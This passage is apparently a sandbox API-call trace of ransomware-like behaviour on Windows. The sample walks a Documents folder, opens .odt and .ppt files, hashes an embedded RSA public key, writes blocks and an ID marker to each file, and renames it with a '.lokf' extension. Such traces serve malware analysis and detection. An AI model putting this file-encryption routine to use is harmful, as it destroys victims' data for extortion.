dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.528] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.528] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.529] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.529] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.529] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.529] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.529] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.529] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.529] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.529] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.529] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.529] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.529] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\") returned="R4I1Q ij0VYYLZ2qE\\" [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0059.529] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87dd0 [0059.529] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.529] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.530] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.530] PathFindFileNameW (pszPath="") returned="" [0059.530] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.530] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf303f550, ftCreationTime.dwHighDateTime=0x1d4ca59, ftLastAccessTime.dwLowDateTime=0x519769b0, ftLastAccessTime.dwHighDateTime=0x1d4cf39, ftLastWriteTime.dwLowDateTime=0x519769b0, ftLastWriteTime.dwHighDateTime=0x1d4cf39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.530] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf303f550, ftCreationTime.dwHighDateTime=0x1d4ca59, ftLastAccessTime.dwLowDateTime=0x519769b0, ftLastAccessTime.dwHighDateTime=0x1d4cf39, ftLastWriteTime.dwLowDateTime=0x519769b0, ftLastWriteTime.dwHighDateTime=0x1d4cf39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.530] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5191130, ftCreationTime.dwHighDateTime=0x1d4ce88, ftLastAccessTime.dwLowDateTime=0x2660a3c0, ftLastAccessTime.dwHighDateTime=0x1d4c830, ftLastWriteTime.dwLowDateTime=0x2660a3c0, ftLastWriteTime.dwHighDateTime=0x1d4c830, nFileSizeHigh=0x0, nFileSizeLow=0x563f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="97eCjaiIhB-aD14f.odt", cAlternateFileName="97ECJA~1.ODT")) returned 1 [0059.530] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.530] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0059.530] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\97eCjaiIhB-aD14f.odt") returned=".odt" [0059.530] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\97eCjaiIhB-aD14f.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r4i1q ij0vyylz2qe\\97ecjaiihb-ad14f.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.530] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=22079) returned 1 [0059.530] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.533] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5619, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.533] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.533] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x563f, lpOverlapped=0x0) returned 1 [0059.534] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.534] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.534] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.534] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.534] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0059.534] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.534] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.535] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.535] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.535] GetLastError () returned 0x0 [0059.535] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.535] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0059.535] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.535] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.535] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.535] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.535] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x563f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.536] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.536] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.536] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.536] CloseHandle (hObject=0x5cc) returned 1 [0059.537] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0059.537] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0059.537] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0059.537] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\97eCjaiIhB-aD14f.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r4i1q ij0vyylz2qe\\97ecjaiihb-ad14f.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\97eCjaiIhB-aD14f.odt.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r4i1q ij0vyylz2qe\\97ecjaiihb-ad14f.odt.lokf")) returned 1 [0059.537] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.537] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.537] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.538] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0059.538] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x403bc420, ftCreationTime.dwHighDateTime=0x1d4c829, ftLastAccessTime.dwLowDateTime=0x3a1324c0, ftLastAccessTime.dwHighDateTime=0x1d4d59a, ftLastWriteTime.dwLowDateTime=0x3a1324c0, ftLastWriteTime.dwHighDateTime=0x1d4d59a, nFileSizeHigh=0x0, nFileSizeLow=0x183d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TTeO3-kFVQDhs.ppt", cAlternateFileName="TTEO3-~1.PPT")) returned 1 [0059.538] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0059.538] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0059.538] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0059.538] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\TTeO3-kFVQDhs.ppt") returned=".ppt" [0059.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\TTeO3-kFVQDhs.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r4i1q ij0vyylz2qe\\tteo3-kfvqdhs.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.538] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=99287) returned 1 [0059.538] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.541] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x183b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.541] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.542] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.542] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.542] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x183d7, lpOverlapped=0x0) returned 1 [0059.542] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.542] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.542] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.542] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.542] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0059.543] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.543] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.543] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.543] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.543] GetLastError () returned 0x0 [0059.543] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.543] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0059.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.543] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.543] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.543] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x183e0) returned 0x9c88ae8 [0059.544] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.544] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87e18 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6a0 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87e60 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6b8 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6e8 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6d0 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.544] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6e8 | out: hHeap=0x660000) returned 1 [0059.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b6d0 [0059.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b6e8 [0059.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.545] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x183d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.545] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.546] 